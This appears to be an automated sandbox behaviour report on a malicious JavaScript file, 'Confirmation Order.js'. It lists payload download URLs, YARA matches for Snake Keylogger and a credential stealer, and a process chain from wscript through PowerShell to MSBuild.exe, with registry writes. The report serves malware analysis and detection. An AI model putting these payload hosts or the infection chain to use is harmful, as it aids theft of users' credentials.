              Source: MSBuild.exe, 0000000E.00000002.2565090170.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D82000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D67000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: MSBuild.exe, 0000000E.00000002.2565090170.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: MSBuild.exe, 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: wscript.exe, 00000000.00000003.1254134560.000001C3FA3ED000.00000004.00000020.00020000.00000000.sdmp, Confirmation Order.jsString found in binary or memory: http://horus-protector.pro/c/
              Source: wscript.exe, 00000000.00000003.1254773282.000001C3FA3E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://horus-protector.pro/c/D9B784E3
              Source: wscript.exe, 00000000.00000003.1286687806.000001C3FA403000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1275232911.000001C3FA403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://horus-protector.pro/c/r4.txt
              Source: wscript.exe, 00000000.00000003.1286687806.000001C3FA403000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280486184.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296398772.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1320207784.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1279199555.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420404535.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1382062786.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1311198727.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363331949.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1299986224.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1330536445.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1281206679.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1415274772.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1358245294.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1311009962.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1304383680.000001C3FA3F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1414143889.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1290917733.000001C3FA3F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1283149965.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1418617023.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1299371299.000001C3FA3F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://horus-protector.pro/c/s4.txt
              Source: MSBuild.exe, 0000000E.00000002.2565090170.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D67000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CCF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: MSBuild.exe, 0000000E.00000002.2565090170.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: MSBuild.exe, 0000000E.00000002.2565090170.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D67000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: MSBuild.exe, 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: MSBuild.exe, 0000000E.00000002.2565090170.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
              Source: MSBuild.exe, 0000000E.00000002.2565090170.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D67000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 64405 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 64401 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 64420 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 64407 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64405
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64416
              Source: unknownNetwork traffic detected: HTTP traffic on port 64413 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64407
              Source: unknownNetwork traffic detected: HTTP traffic on port 64416 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 64399 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 64410 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64420
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64399
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64410
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64413
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64401

              System Summary

              barindex
              Source: amsi64_7688.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: MSBuild.exe PID: 7880, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: MSBuild.exe PID: 7880, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BAC19014_2_02BAC190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BA610814_2_02BA6108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BA673014_2_02BA6730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BAF77814_2_02BAF778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BAC75214_2_02BAC752
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BAB4F214_2_02BAB4F2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BAE43114_2_02BAE431
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BAC47014_2_02BAC470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BA4AD914_2_02BA4AD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BACA3214_2_02BACA32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BABBC714_2_02BABBC7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BA985814_2_02BA9858
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BABEB714_2_02BABEB7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BAD7F014_2_02BAD7F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BAD7E014_2_02BAD7E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_02BA357214_2_02BA3572
              Source: Confirmation Order.jsInitial sample: Strings found which are bigger than 50
              Source: amsi64_7688.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: MSBuild.exe PID: 7880, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: MSBuild.exe PID: 7880, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@10/14@3/3
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\s4[1].txtJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
              Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_234914540
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xp0fju0e.jys.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\YLhjFraZZwiadZg.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: MSBuild.exe, 0000000E.00000002.2565090170.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002E6D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2567601307.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002E46000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Confirmation Order.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\YLhjFraZZwiadZg.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7688" "2844" "2376" "2388" "0" "0" "2436" "0" "0" "0" "0" "0"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7688" "2844" "2376" "2388" "0" "0" "2436" "0" "0" "0" "0" "0" Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
